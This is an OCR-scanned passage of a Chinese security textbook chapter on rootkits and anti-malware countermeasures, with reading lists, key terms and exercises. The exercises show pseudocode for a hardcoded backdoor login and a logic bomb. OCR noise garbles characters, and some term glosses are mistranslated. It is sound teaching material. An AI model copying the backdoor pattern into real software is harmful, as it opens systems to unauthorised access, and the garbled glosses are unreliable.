或 受到 破坏 的 虚拟 机 监视 器 或 虚拟 层 ， 并 得 到 新 式 处 理 器 支持 的 硬件 虚拟 化 辅助 。rootkit 代码 
完全 运行 在 目标 操作 系统 甚至 是 内 核 代 码 的 视野 的 下 层 ， 因 为 操作 系统 并 不 知道 自己 正 运行 在 
虚拟 机 中 ， 并 可 能 受到 来 自 底层 代码 的 监视 和 攻击 [SKAP07]。 

几 种 虚拟 化 rootkit 的 原型 已 经 在 2006 年 被 公之于众 。 其 中 ，SubVirt 可 以 攻击 运行 在 微软 
的 Virtual PC 或 VMWare 的 Workstation 虚拟 层 下 的 Windows 系统 ， 方 式 是 修改 它们 使 用 的 引 
导 进 程 。 当 然 ， 这 些 修改 也 使 得 这 一 rootkit 的 存在 有 可 能 被 检测 发 现 。 

但 是 ， 另 一 个 名 为 Blue Pill 的 rootkit 能 够 在 系统 下 层 安 装 一 个 很 “轻薄 ”的 虚拟 层 来 攻 
击 本 地 Windows Vista 系统 ， 然 后 继续 无 颖 地 在 虚拟 机 中 执行 该 系统 。 因 为 其 只 需 利用 Vista 内 
核 执行 一 个 流氓 驱动 ，rootkit 便 可 以 在 目标 系统 执行 时 安装 自身 ， 这 非常 难以 被 检测 。 对 运行 
在 支持 硬件 虚拟 化 的 新 型 处 理 器 上 但 并 没有 真正 使 用 虚拟 层 的 系统 而 言 ， 此 类 rootkit 特别 具 
有 威胁 性 。 

一 些 其 他 的 rootkit 变种 利用 Intel 处 理 器 用 于 控制 低级 硬件 的 系统 管理 模式 ( System 
Management Mode, SMM) S9， 或 者 用 于 首次 引导 的 BIOS 代码 。 此 类 代码 对 附属 硬件 设备 有 
直接 的 权限 ， 对 于 运行 在 这 些 特殊 模式 之 外 的 代码 一 般 不 可 见 [EMBL08]。 

为 了 应 对 这 些 类 型 的 rootkit， 必 须 确保 整个 引导 过 程 都 是 安全 的 ， 这 样 操作 系统 在 加 载 过 
程 中 就 不 会 安装 此 类 恶意 代码 。 这 需要 监视 所 有 的 虚拟 层 代 码 以 确保 其 是 合法 的 。 我 们 将 在 第 
12 章 进一步 讨论 这 方面 的 内 容 。 


6.10 ”对 抗 手段 


这 一 节 我 们 讨论 针对 恶意 软件 的 可 能 对 抗 手段 。 这 些 手 段 通常 被 称 为 “ 反 病 毒 ” 机 制 ， 因 
为 它们 的 开发 最 初 是 专门 针对 计算 机 病毒 的 。 但 是 ， 如 今 它们 已 经 进化 为 针对 我 们 在 本 章 讨论 
的 大 部 分 种 类 恶意 软件 的 安全 措施 。 


6.10.1 针对 恶意 软件 的 对 抗 措施 
理想 的 应 对 恶意 软件 威胁 的 方法 是 预防 。 首 当 其 冲 的 是 阻止 恶意 软件 进入 计算 机 系统 ， 然 
后 是 阻止 其 修改 计算 机 系统 。 完 全 达到 这 一 目标 几乎 是 不 可 能 的 ， 当 然 ， 采 取 适 当 的 措施 以 强 


O ”系统 管理 模式 是 Intel 处 理 器 上 用 来 对 低级 硬件 进行 控制 的 相对 透明 的 模式 ， 其 有 自身 私有 的 存储 空间 和 执 
行 环境 ， 对 运行 在 外 部 的 代码 一 般 是 透明 的 〈 例 如 ， 运 行 在 操作 系统 中 )。 
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化 系统 和 防止 恶意 软件 感染 系统 的 确 可 以 极 大 地 减少 其 攻击 的 成 功率 。 文 献 [SOUP 13] 提出 了 
恶意 软件 预防 措施 的 4 个 主要 元 素 : 规则 、 警 惕 性 、 弥 补 弱点 和 缓解 威胁 。 有 一 个 针对 恶意 软 
件 的 正当 防御 策略 为 采取 适当 的 预防 措施 提供 了 基础 。 
一 个 最 基本 的 防御 措施 是 保证 操作 系统 的 版 本 尽 可 能 及 时 更 新 ， 打 上 全 部 的 补丁 ， 这 样 可 
以 减少 大 部 分 针对 系统 漏洞 的 攻击 。 接 下 来 则 是 为 系统 中 的 应 用 程序 和 数据 存储 设置 适当 的 访 
问 控制 ， 使 得 任何 用 户 都 能 够 访问 的 文件 尽 可 能 地 少 ， 从 而 减少 可 能 随 此 类 文件 的 执行 而 发 生 
的 恶意 软件 感染 和 系统 破坏 。 这 些 措施 直接 针对 蠕虫 、 病 毒 和 某 些 木马 使 用 的 关键 传播 机 制 。 
我 们 将 在 第 12 章 对 其 进行 更 深入 的 讨论 。 
防御 恶意 软件 的 第 三 种 传播 机 制 ， 即 利用 社会 工程 学 的 攻击 方法 ， 需 要 依赖 适当 的 用 户 安 
全 意识 和 相关 培训 。 这 是 为 了 让 用 户 对 这 些 攻击 有 更 好 的 警惕 性 ， 避 免 他 们 做 出 会 导致 受到 攻 
击 的 行为 。 文 献 [SOUP13] 提供 了 有 关 适 当 的 安全 意识 的 实例 ， 我 们 将 在 第 17 章 再 回顾 这 一 
话题 。 
如 果 预 防 措施 失败 了 ， 针 对 恶意 软件 威胁 还 存在 以 下 由 各 种 技术 性 手段 所 支持 的 缓解 
措施 : 
o $M] (detection): 一 旦 被 感染 ， 就 马上 确定 恶意 软件 的 存在 并 对 其 定位 。 
e 识别 (identification): 一 旦 检测 到 恶意 软件 ， 立 即 识别 出 是 何 种 恶意 软件 感染 了 系统 。 
o 清除 (removal): 一 旦 识别 出 恶意 软件 类 型 ， 立 刻 清除 恶意 代码 在 被 感染 的 系统 中 的 所 
有 痕迹 ， 以 阻止 其 继续 扩散 。 
如 果 成 功 检测 到 恶意 软件 但 没有 成 功 识 别 或 清除 ， 可 以 选择 删除 所 有 被 感染 文件 或 恶意 文 
件 ， 并 重新 加 载 上 述 文 件 的 干净 的 备份 版 本 。 对 于 有 些 特别 奖 固 的 感染 ， 可 能 需要 完全 清理 所 
有 的 存储 ， 然 后 利用 干净 的 媒介 重建 系统 。 
首先 ， 让 我 们 考虑 一 下 有 效 的 恶意 软件 对 抗 措施 要 满足 哪些 要 求 : 
o 通用 性 (generality): 使 用 的 方法 应 该 能 对 付 绝 大 多 数 攻击 。 
e 及 时 性 (timeliness): 使 用 的 方法 应 该 能 快速 做 出 响应 ， 以 限制 被 感染 程序 或 系统 数量 
和 随 之 而 来 的 行为 。 
o 弹性 (resiliency): 使 用 的 方法 应 该 能 够 抵抗 攻击 者 为 了 躲避 反 恶 意 软 件 技术 而 使 用 的 
隐藏 技术 。 
© 最 小 拒绝 服务 代价 (minimal denial-of-service cost): 反 病 毒 软件 的 应 用 要 尽量 减少 对 主 
机 性 能 和 服务 质量 的 影响 。 也 就 是 说 ， 在 防治 恶意 软件 时 ， 不 能 显著 干扰 主机 的 正常 
操作 。 
o 透明 性 (transparency): 防治 软件 和 设备 不 能 要 求 修 改 现 有 的 操作 系统 、 应 用 程序 和 
硬件 。 
。 全 局 与 局 部 覆盖 范围 (global and local coverage): 使 用 的 方法 应 该 能 够 同时 处 理 来 自 企 
业 网 外 部 和 内 部 的 攻击 源 。 
不 过 ， 要 达到 所 有 这 些 要 求 则 通常 需要 多 种 手段 相 结 合 的 深度 防护 策略 ( defense-in-depth 
strategy)。 
恶意 软件 的 检测 可 以 部 署 在 许多 不 同 的 位 置 。 它 可 能 是 运行 于 受 感染 系统 中 、 监 视 进 入 系 
统 的 数据 和 系统 中 程序 的 运行 和 行为 的 反 病 毒 程序 ; 也 可 以 是 某 个 组 织 的 网 络 防火 墙 或 人 侵 检 
测 系统 (intrusion detection system, IDS) 所 维护 的 边界 安全 机 制 的 一 部 分 。 最 后 ， 检 测 也 可 以 
分 布 式 地 同时 从 主机 和 边界 传感器 收集 数据 (这 或 许 会 涵盖 大 量 的 网 络 和 组 织 ) 以 便 能 够 以 最 
大 的 视野 了 解 恶 意 软件 的 活动 情况 。 下 面 我 们 详细 讨论 上 述 的 每 一 种 方式 。 
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6.10.2 ”基于 主机 的 扫描 器 


反 病 毒 软件 的 首要 部 署 位 置 是 各 个 终端 系统 。 这 不 仅 给 予 了 反 病 毒 软件 最 大 的 权限 来 收集 
亚 意 软件 对 目标 系统 造成 的 影响 ， 还 能 将 恶意 软件 的 活动 限制 在 最 小 范围 。 个 人 电脑 如 今 已 经 
广泛 地 使 用 了 反 病 毒 软件 ， 这 在 某 种 程度 上 也 是 因为 恶意 软件 的 规模 和 活动 的 爆炸 式 增长 。 这 
类 软件 可 以 视 为 基于 主机 的 入 侵 检测 系统 的 一 种 形式 ， 我 们 将 在 8.4 节 做 更 全 面 的 讨论 。 道 高 
一 义 魔 高 一 丈 ， 早 期 的 恶意 软件 代码 相对 简单 ， 易 于 检测 ， 所 以 容易 被 相对 简单 的 反 病 毒 软件 
识别 和 清除 。 随 着 恶意 软件 军备 竞赛 的 升级 ， 亚 意 软 件 代 码 和 反 病 毒 软件 都 在 变 得 更 复杂 ， 更 
精妙 。 

[STEP93] 将 反 病 毒 软件 的 发 展 划分 为 四 代 : 

e 第 一 代 : 简单 的 扫描 器 。 

e 第 二 代 : 启发 式 扫描 器 。 

e 第 三 代 : 活动 陷阱 (activity trap). 

e 第 四 代 : 全 面 的 保护 。 

第 一 代 扫 描 器 需要 病毒 特征 码 来 识别 病毒 。 病 毒 也 许 会 含有 “通配符 "， 但 就 本 质 而 言 ， 
所 有 拷贝 都 具有 相同 的 结构 和 比特 模式 。 基 于 病毒 特征 码 的 扫描 仅仅 局 限于 检测 已 知 病毒 。 另 
一 种 第 一 代 扫 描 器 记录 系统 中 各 可 执行 文件 的 长 度 信息 ， 然 后 通过 检查 文件 长 度 变 化 来 检测 
病毒 。 

第 二 代 扫 描 器 不 再 依赖 于 病毒 特征 码 ， 而 是 通过 启发 式 规 则 来 检测 可 能 存在 的 病毒 感染 。 
其 中 有 一 类 扫描 器 是 通过 搜索 经 常 与 病毒 关联 的 代码 段 来 检测 病毒 。 例 如 ， 扫 描 器 可 能 会 搜索 
多 态 病毒 使 用 的 加 密 循 环 的 起 始 部 分 并 发 现 其 加 密 的 密 钥 。 一 旦 发 现 了 密 钥 ， 扫 描 器 就 能 解密 
病毒 ， 并 识别 病毒 类 型 ， 然 后 清除 病毒 并 使 被 感染 程序 重新 提供 服务 。 

第 二 代 扫 描 的 另 一 种 方法 是 完整 性 检测 。 每 个 程序 都 被 附加 一 个 校 验 和 。 如 果 病 毒 感染 了 
程序 但 没有 修改 程序 后 面 附加 的 校 验 和 ， 完 整 性 检测 就 能 发 现 病毒 对 文件 的 修改 。 为 了 对 付 那 
些 在 感染 时 能 自动 修改 校 验 和 的 病毒 ， 需 要 使 用 带 加 密 功 能 的 散 列 函数 。 加 密 的 密 钥 要 与 程序 
分 开 保 存 ， 使 病毒 无 法 生成 新 的 散 列 码 并 对 其 进行 加 密 。 通 过 使 用 散 列 函 数 而 不 是 简单 的 校 验 
和 ， 就 可 以 防止 病毒 与 以 前 一 样 通过 调整 程序 来 产生 相同 的 散 列 码 。 

第 三 代 反 病 毒 程序 是 内 存 驻 留 程序 ， 它 通过 病毒 行为 来 识别 病毒 而 不 是 通过 被 感染 文件 的 
内 部 结构 特征 。 这 种 反 病 毒 程序 的 优点 是 不 用 为 大 量 的 病毒 生成 特征 码 和 启发 式 规则 。 它 只 需 
要 去 识别 一 小 部 分 预示 病毒 想 要 感染 的 行为 ， 然 后 阻止 这 些 行 为 。 

第 四 代 产 品 是 综合 运用 各 种 反 病 毒 技 术 的 软件 包 。 它 包括 扫描 和 活动 陷阱 组 件 。 同 时 还 加 
入 了 访问 控制 功能 ， 从 而 限制 了 病毒 对 系统 渗透 的 能 力 ， 也 就 限制 了 病毒 修改 文件 以 继续 传播 
的 能 力 。 

病毒 和 反 病 毒 的 较量 还 在 继续 。 随 着 第 四 代 反 病毒 软件 的 出 现 ， 我 们 采用 了 更 加 全 面 的 
防御 策略 ， 从 而 将 防范 扩大 到 更 广泛 意义 上 的 计算 机 安全 领域 。 下 面 重点 讨论 两 种 最 重要 的 
方法 。 

通用 解密 ”通用 解密 (Generic Decryption, GD) 技术 使 反 病毒 程序 能 在 保持 很 快 的 扫描 速 
度 的 同时 ,很 容易 地 检测 到 病毒 ， 即 使 是 最 复杂 的 多 态 病毒 [NACH97]。 回 想 一 下 ， 当 含有 多 
态 病 毒 的 文件 执行 时 ， 病 毒 需要 将 其 自身 解密 以 得 到 激活 。 为 了 检测 到 这 样 的 病毒 结构 ， 可 执 
行文 件 要 通过 GD 扫描 器 运行 。GD 扫描 器 包括 以 下 要 素 ， 

© CPU 仿真 器 (CPU emulator): 一 个 基于 软件 的 虚拟 计算 机 。 可 执行 文件 中 的 指令 被 仿 

真 器 解析 ， 而 不 是 直接 在 底层 的 处 理 器 上 执行 。 仿 真 器 通过 软件 模拟 了 处 理 器 的 所 有 
寄存 器 和 其 他 处 理 器 中 的 硬件 ， 使 底层 的 处 理 器 不 会 受到 在 仿真 器 中 被 解释 执行 的 程 
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序 的 影响 。 
© 病毒 特征 码 扫 描 器 (virus signature scanner): 扫描 目标 代码 来 寻找 已 知 的 病毒 特征 码 的 
模块 。 

© 仿真 控制 模块 (emulation control module): 控制 目标 代码 执行 的 模块 。 

每 一 次 仿真 开始 时 ，CPU 仿真 器 会 逐条 解析 目标 代码 中 的 指令 。 因 此 ， 如 果 代 码 中 包含 
用 于 解密 和 释放 病毒 的 解密 过 程 ， 那 么 这 段 代 码 将 被 解析 出 来 。 实 际 上 ， 病 毒 暴 露 其 本 身 是 帮 
助 反 病毒 程序 完成 了 工作 。 控 制 模块 会 周期 性 地 中 断 仿真 器 的 执行 ， 并 扫描 目标 代码 中 是 否 含 
有 病毒 特征 码 。 

在 解析 执行 过 程 中 ， 目 标 代码 不 会 对 计算 机 造成 破坏 ， 因 为 这 种 解析 执行 是 在 一 种 完全 可 
控 的 环境 中 进行 的 。 

设计 GD 扫描 器 最 大 的 困难 是 确定 运行 每 次 解析 的 时 间 。 通 常 ， 病 毒 部 分 会 在 程序 开始 运 
行 之 后 马上 被 激活 ， 但 是 并 不 是 所 有 的 病毒 都 是 如 此 。 扫 描 器 对 一 个 程序 的 仿真 时 间 越 长 ， 就 
越 有 可 能 发 现 隐蔽 的 病毒 。 但 是 反 病毒 软件 只 能 占用 一 定 限 度 的 时 间 和 系统 资源 ， 否 则 会 引起 
用 户 对 系统 功能 降低 的 抱怨 。 

基于 主机 的 行为 阻 断 软件 “与 启发 式 或 基于 特征 码 的 扫描 器 不 同 ， 行 为 阻 断 软 件 与 主机 的 
操作 系统 相 结合 ， 实 时 监控 恶意 的 程序 行为 [CONR02，NACH02]。 这 是 一 类 基于 主机 的 人 侵 
检测 系统 ， 我 们 将 在 9.6 节 进 行 深 入 讨论 。 行为 阻 断 软件 能 够 在 程序 的 恶意 行为 影响 计算 机 之 
前 将 其 阻 断 。 被 监控 的 程序 行为 包括 : 

e 试图 打开 、 浏 览 、 删 除 或 修改 文件 。 

© 试图 格式 化 磁盘 以 及 其 他 不 可 恢复 的 磁盘 操作 。 

e 对 可 执行 程序 或 宏 的 逻辑 机 制 进行 修改 。 

e 修改 系统 的 关键 设置 ， 例 如 启动 设置 。 

e 通过 电子 邮件 或 者 即时 通信 软件 发 送 可 执行 内 容 。 

© 初始 化 网 络 通信 。 

因为 行为 阻 断 软 件 能 及 时 阻 断 可 疑 软 件 的 执行 ， 这 比 起 现 有 的 反 病毒 检测 技术 (如 特征 码 
技术 和 启发 式 技 术 ) 具有 很 大 的 优势 。 因 为 即使 打 乱 再 重 排 病 毒 或 者 蠕虫 的 指令 序列 的 方法 很 
多 ， 而 且 许多 方法 都 可 以 有 效 地 躲避 特征 码 扫描 器 或 启发 式 方法 的 检测 ， 但 是 最 终 ， 恶 意 代 码 
必须 要 向 系统 发 送 特定 的 请 求 。 因 此 ,行为 阻 断 程序 通过 截获 所 有 这 样 的 请 求 ， 能 够 识别 并 阻 
止 恶意 行为 ， 而 不 管 病毒 或 者 蠕虫 如 何 使 其 代码 变 得 模糊 、 难 以 识别 。 

单纯 的 行为 阻 断 是 有 局 限 性 的 。 因 为 在 恶意 程序 的 所 有 行为 被 识别 出 来 之 前 ， 该 程序 已 经 
在 目标 机 器 上 执行 了 ， 所 以 在 它 被 检测 并 阻止 之 前 就 可 能 已 经 对 系统 造成 了 损害 。 例 如 ， 一 个 
新 病毒 可 能 在 其 感染 某 个 文件 并 被 阻 断 之 前 ， 已 经 将 硬盘 上 的 一 些 看 起 来 不 重要 的 文件 转移 了 
位 置 。 即 使 病毒 的 实际 感染 行为 被 阻 断 了 ， 用 户 可 能 也 无 法 定位 他 的 文件 ， 这 会 导致 生产 效率 
的 降低 甚至 更 糟糕 的 情况 。 

间谍 软件 的 检测 和 移 除 ”虽然 普通 的 反 病毒 产品 包含 了 用 以 检测 间谍 软件 的 特征 码 ， 但 是 
该 类 恶意 软件 带 来 的 威胁 和 其 使 用 的 隐藏 技术 ， 意 味 着 一 系列 的 专门 性 间谍 软件 检测 和 清除 工 
具 仍 然 有 存在 的 必要 。 这 些 工具 可 以 专业 地 检测 和 清除 恶意 软件 ， 并 可 以 提供 更 稳定 的 安全 性 
能 。 因 此 ,它们 可 以 作为 通用 的 反 病 毒 产 品 的 有 益 补充 (并 应 该 与 之 共同 使 用 )。 

rootkit 对 策 rootkit 的 检测 和 清除 是 非常 困难 的 ， 特 别 是 内 核 级 的 rootkit。rootkit 能 够 精 
确 地 损坏 那些 能 够 检测 rootkit 并 发 现 其 踪迹 的 管理 工具 ， 使 自己 不 被 检测 到 。 

防范 rootkit 需要 多 种 网 络 级 和 计算 机 级 的 安全 工具 。 基 于 网 络 和 基于 主机 的 人 侵 检测 系 
统 都 能 够 用 来 检测 输入 通信 量 中 已 知 的 rootkit 攻击 的 代码 特征 。 基 于 主机 的 反 病 毒 软件 也 能 
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被 用 来 识别 那些 已 知 rootkit 的 特征 。 

当然 ， 新 的 rootkit 或 者 已 有 rootkit 的 表现 出 新 特征 码 的 修改 版 本 会 不 断 出 现 。 对 于 这 种 
情况 ， 系 统 需要 搜索 那些 能 够 预示 rootkit 存在 的 行为 ， 例 如 截获 系统 调用 或 者 与 键盘 驱动 程 
序 交 互 的 键盘 记录 器 等 。 这 些 行为 还 远 远 不 能 达到 检测 的 目的 。 例 如 ， 反 病毒 软件 通常 也 会 通 
过 截获 系统 调用 来 检测 。 

另 一 种 解决 方法 是 对 某 类 文件 做 完整 性 校 验 。RootkitRevealer 就 是 这 样 的 一 个 例子 ， 它 是 
SysInternals 公司 发 布 的 免费 软件 。 这 个 工具 将 使 用 API 的 系统 扫描 结果 与 不 使 用 API 的 指令 
所 获得 的 实际 存储 视图 进行 对 比 。 因 为 rootkit 通过 修改 系统 管理 员 调 用 所 能 看 到 的 存储 视图 
来 隐藏 自己 ， 而 RootkitRevealer 正 是 利用 了 这 个 差异 。 

如 果 检 测 到 一 个 系统 级 的 rootkit， 那 么 无 论 如 何 ， 唯 一 安全 可 靠 的 解决 办 法 就 是 彻底 重 装 
被 感染 机 器 的 操作 系统 。 


6.10.3 边界 扫描 方法 


反 病 毒 软件 部 署 的 第 二 个 位 置 是 防火 墙 或 人 侵 检测 系统 。 它 们 通常 包含 在 运行 于 这 些 系统 
上 的 电子 邮件 和 Web 代理 服务 中 ， 但 也 可 能 包含 在 入侵 检测 系统 的 流量 分 析 组 件 中 。 如 此 反 
病毒 软件 便 可 以 访问 通过 网 络 连接 向 组 织 内 部 的 任何 系统 传播 的 恶意 软件 ， 从 而 以 更 大 的 视野 
观察 恶意 软件 的 活动 。 反 病毒 软件 也 可 能 包含 有 预防 人 侵 的 措施 ， 有 能力 屏蔽 任何 可 疑 的 网 络 
流量 ， 因 此 可 以 防止 恶意 软件 进入 和 损害 目标 系统 ， 无 论 威胁 来 自 内 部 还 是 外 部 。 

但 是 ， 这 些 方法 存在 局 限 性 ， 只 能 扫描 恶意 软件 本 身 ， 并 不 能 对 运行 在 被 感染 系统 中 的 恶 
意 软 件 所 表现 的 行为 进行 遏制 。 监 控 软 件 有 两 种 类 型 : 

e 入 口 监控 软件 (ingress monitor): 这 类 软件 被 安装 在 企业 内 部 网 络 和 Internet 之 间 。 

它们 可 以 是 一 个 边界 路 由 器 或 者 外 部 防火 墙 或 者 独立 的 被 动 监控 器 的 人 口 过 滤 软 件 
的 一 部 分 。 这 些 监视 器 能 够 使 用 异常 特征 或 启发 式 的 方式 来 检测 恶意 软件 的 流量 ， 
我 们 将 在 第 8 章 深 入 讨论 这 个 问题 。 一 个 蜜 负 也 可 以 捕获 到 输入 的 恶意 软件 流量 。 
和信 口 监控 的 检测 技术 的 一 个 例子 是 监测 那些 针对 未 被 使 用 的 本 地 IP 地址 的 输入 通 
信 流 量 。 
出 口 监控 软件 ( egress monitor): 这 些 软件 可 以 被 安装 在 企业 内 部 网 络 中 的 各 个 独立 局 
域 网 的 出 口 点 上 ， 也 可 以 被 安装 在 企业 内 部 网 与 Internet 之 间 。 对 于 前 一 种 情况 ， 出 
口 监控 软件 可 以 是 局 域 网 路 由 器 或 交换 机 的 出 口 过 滤 软 件 的 一 部 分 。 和 入 口 监控 一 样 ， 
外 部 防火 墙 和 蜜 钠 也 可 以 包含 出 口 监控 软件 。 事 实 上 ， 这 两 类 监控 软件 可 以 被 安装 在 一 
起 。 出 口 监控 就 是 用 来 通过 监控 输出 通信 中 是 否 存在 扫描 或 者 其 他 可 疑 行为 来 捕获 恶意 
软件 攻击 的 源头 。 这 些 监 控 方 法 可 以 寻找 蠕虫 的 行为 ， 限 制 网 络 速 率 或 阻止 网 络 流量 。 
也 能 够 检测 和 应 对 非 正 常 大 量 的 电子 邮件 流量 ， 如 海量 邮件 蠕虫 ( mass-mail worm) 或 
垃圾 电子 邮件 载荷 所 造成 的 流量 。 

边界 监控 也 能 够 通过 检测 非 正常 网 络 流量 模式 以 协助 检测 相应 的 僵尸 网 络 活动 。 当 僵尸 机 
们 被 激活 并 进行 攻击 时 ， 这 些 防范 措施 能 够 检测 到 这 个 攻击 。 但 是 ， 这 些 措施 的 主要 目标 应 该 
是 在 僵尸 网 络 的 组 建 阶段 就 检测 到 并 予以 阻止 ， 具 体 手 段 则 是 利用 我 们 之 前 讨论 过 的 多 种 扫描 
技术 ， 识 别 和 阻止 恶意 软件 对 与 恶意 软件 有 关 的 载荷 的 传播 。 


6.10.4 ”分 布 式 情报 收集 方法 


使 用 反 病 毒 软件 的 最 后 一 种 方式 是 对 其 进行 分 布 式 配 置 。 它 从 大 量 的 主机 或 边界 传感器 
中 收集 数据 ， 把 这 些 信 息 发 送 至 一 个 能 够 将 数据 进行 联系 和 分 析 的 中 央 分 析 系 统 。 该 系统 随后 
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即 可 对 恶意 软件 的 特征 和 行为 模式 做 出 更 新 ， 并 返回 给 所 有 受 其 协调 的 系统 以 共同 应 对 和 防御 
人 们 设计 了 许多 这 样 的 系统 ， 它 们 实际 上 是 分 布 式 人 侵 防 御 系统 (Intrusion 


恶意 软件 的 攻击 。 


Prevention System, IPS) 的 一 种 特殊 的 范例 ， 我 们 将 在 9.6 节 对 其 加 以 深入 讨论 。 
6.11 ”推荐 读物 


为 了 透彻 地 理解 病毒 ， 推 荐 阅读 [SZOROS]. [AYCO06] 也 是 一 本 很 好 的 书 。[CASS01]、 
[KEPH97a] 和 [NACH97] 是 很 好 的 关于 病毒 和 蠕虫 的 综述 性 文章 。[MOOR02] 提出 了 一 个 很 好 
的 对 付 红色 代码 蠕虫 的 方法 。[WEAV03] 是 关于 蠕虫 特征 的 全 面 的 综述 。[HYPP06] 讨论 了 手 


机 上 的 蠕虫 攻击 。 


[HOLZ05] 和 [MCLA04] 提供 了 关于 僵尸 机 的 概述 。[LEVI06]、[LEVI04]、[GEER06] 和 


[EMBL08] 讲述 了 多 种 类 型 的 rootkit 和 它们 的 操作 。 
[SOUP13] 提供 了 有 关 亚 意 软件 预防 和 处 理 的 指导 。 
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6.12 关键 术语 、 复 习题 和 习题 


关键 术语 


advanced persistent threat (高 级 持续 性 威胁 ) 
adware (广告 软件 ) 

backdoor (后 门 ) 

blended attack (混合 攻击 ) 
boot-sector infector (引导 扇 区 病毒 ) 
botnet (僵尸 网 络 ) 

crimeware (犯罪 软件 ) 

data exfiltration (数据 免疫 系统 ) 
downloader (下 载 器 ) 
drive-by-download (路 过 式 下载 ) 
e-mail virus (电子 邮件 病毒 ) 
infection vector (感染 向 量 ) 
keyloggers (键盘 记录 器 ) 

logic bomb (逻辑 炸弹 ) 

macro virus ( 宏 病 毒 ) 

malicious software (恶意 软件 ) 
metamorphic virus (变形 病毒 ) 
mobile code (移动 代码 ) 


复习 题 
6.1 恶意 软件 的 三 种 传播 机 制 是 什么 ? 


6.2 ”恶意 软件 所 携带 的 四 大 类 有 效 载 荷 是 什么 ? 


6.3 ”高 级 持续 性 威胁 有 什么 特征 ? 


6.4 ”病毒 或 蠕虫 执行 过 程 中 的 典型 阶段 是 什么 ? 


6.5 ”病毒 利用 什么 机 制 隐藏 自身 ? 
6.6 ”机 器 可 执行 病毒 和 宏 病毒 有 何 区 别 ? 
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parasitic virus (寄生 病毒 ) 
payload (有 效 载荷 ) 

phishing (网 络 钓鱼 ) 

polymorphic virus (多 态 病 毒 ) 
propagate (传播 ) 

ransomware (勒索 软件 ) 

scanning (HAt) 

spear-phishing ( 鱼 叉 式 网 络 钓鱼 ) 
spyware( 间 谍 软 件 ) 

stealth virus (隐蔽 型 病毒 ) 
trapdoor ( 陷 门 ) 

Trojan horse (特洛伊 木马 ) 

virus (病毒 ) 

watering-hole attack (水 洞 式 攻 击 ) 
worm (蠕虫 ) 

zombie (僵尸 机 ) 

zero-day exploit ( 0-day 攻击 ) 


6.7 蠕虫 利用 什么 方法 获得 远程 系统 的 权限 进行 传播 ? 


6.8 ”什么 是 路 过 式 下 载 ? 它 如 何 传播 蠕虫 ? 


6.9 ”木马 如 何 传播 恶意 软件 ? 计算 机 系统 中 的 森马 有 何 共 同 点 ? 移动 平台 中 呢 ? 


6.10 ”什么 是 逻辑 炸弹 ? 


6.11 后 门 、bot、 键 盘 记录 器 、 间 谍 软 件 和 rootkit 之 间 有 何 差 别 ? 它们 能 否 在 同一 个 恶意 软件 内 呈现 ? 
6.12 ”网 络 钓鱼 攻击 和 鱼 叉 式 网 络 钓鱼 有 什么 区 别 ， 特 别 是 在 目标 上 ? 


6.13 ”列举 rootkit 在 系统 中 使 用 的 不 同 层面 。 
6.14 说明 一 些 恶 意 软 件 对抗 措 施 的 要 点 。 
6.15 ”列举 三 种 恶意 软件 对 抗 机 制 部 署 的 位 置 。 
6.16 ”简要 描述 四 代 反 病毒 软件 。 


6.1 图 6-1 的 病毒 程序 中 有 一 个 缺点 ， 请 指出 。 


6.2 ”有 这 样 一 个 问题 : 是否 可 以 开发 一 个 程序 对 软件 进行 分 析 ， 以 此 来 判定 该 软件 是 否 是 病毒 程序 。 假 
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设 我 们 有 一 个 程序 D 能 够 完成 这 样 的 工作 。 对 于 任意 程序 P， 当 我 们 运行 D(P) 时 ， 返 回 的 结果 是 
TRUE (P 是 病毒 ) R FALSE (P 不 是 病毒 )。 考 虑 如 下 的 程序 : 


Program CV := 


Faes 
main-program := 
{if D(CV) then goto next: 
else infect-executable; 


next: 


在 上 面 的 程序 中 ，infect-executable 是 这 样 一 个 模块 ， 它 扫描 内 存 中 的 可 执行 程序 ， 然 后 将 其 自身 复 
制 到 这 些 程序 中 。 如 果 D 能 够 正确 地 判断 的 话 ， 请 判定 CV 是 否 为 病毒 。 


63 下面 是 一 段 病毒 指令 和 该 病毒 指令 变形 后 的 版 本 。 描 述 变形 代码 所 产生 的 效果 。 






mov eax 5 
add eax,ebx 
call [eax] 









mov eax,5 
push ecx 
pop ecx 
add eax,ebx 
swap eax,ebx 
swap ebx,eax 
call [eax] 
nop 


6.4 在 本 书 的 网 站 中 提供 了 Morris 蠕虫 所 用 到 的 口令 列表 。 


a. 很 多 人 都 认为 这 个 列表 列 出 了 人 们 一 般 用 作 口 令 的 所 有 单词 。 这 看 起 来 可 能 吗 ? 证 明 你 的 回答 。 
b. 如 果 这 个 列表 不 能 反映 出 经 常 使 用 的 所 有 口令 ， 那 么 提出 一 些 Morris 可 能 用 来 构建 这 个 列表 的 
方法 。 


65 思考 如 下 程序 段 ， 


legitimate code 

if data is Friday the 13th; 
crash_computer () ; 

legitimate code 


这 属于 哪 类 恶意 软件 ? 


6.6 思考 下 面 的 认证 程序 片段 : 


username = read_username() ; 

password = read_password(); 

if username is “133t h4ckOr” 
return ALLOW LOGIN; 

if username and password are valid 
return ALLOW_LOGIN 

else return DENY_LOGIN 


这 属于 哪 类 恶意 软件 ? 


6.7 ”假如 你 在 单位 的 停车 场 捡 到 了 一 个 U 盘 。 如 果 你 将 此 UU 盘 直 接连 接 至 你 的 工作 电脑 并 查看 其 中 的 


内 容 ， 这 一 做 法 可 能 会 带 来 什么 样 的 威胁 ? 特别 是 ， 思 考 是 不 是 我 们 所 讨论 过 的 每 种 恶意 软件 传播 
机 制 都 可 以 通过 这 样 一 个 存储 盘 进 行 传播 ? 你 将 采用 哪些 步骤 以 降低 此 威胁 ， 并 安全 地 查看 存储 盘 
中 的 内 容 ? 


6.8 ”如 果 你 发 现 你 家 中 的 电脑 对 网 络 中 的 信息 请 求 响应 非常 慢 ， 并 且 在 进一步 检查 网 关 后 ， 你 发 现 即使 


关闭 了 电子 邮件 客户 端 ， 浏 览 器 和 其 他 使 用 网 络 的 程序 ， 仍 能 发 现 有 大 量 的 网 络 活动 。 什 么 类 型 的 
恶意 软件 能 够 导致 此 类 情况 ?讨论 此 恶意 软件 可 能 是 怎样 获得 对 你 的 系统 的 访问 的 ?你 能 够 用 哪些 


6.9 


6.10 


6.11 


6.12 


6.13 


6.14 
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步骤 来 检测 是 否 存在 恶意 软件 ? 如 果 你 确实 在 电脑 中 发 现 恶 意 软件 ， 如 何 将 其 恢复 为 安全 的 系统 ? 
假如 当 你 要 从 一 些 网 站 上 收集 一 些 短视 频 时 ， 你 看 到 一 个 弹 窗 ， 告 诉 你 必须 要 安装 一 些 代码 才 可 以 
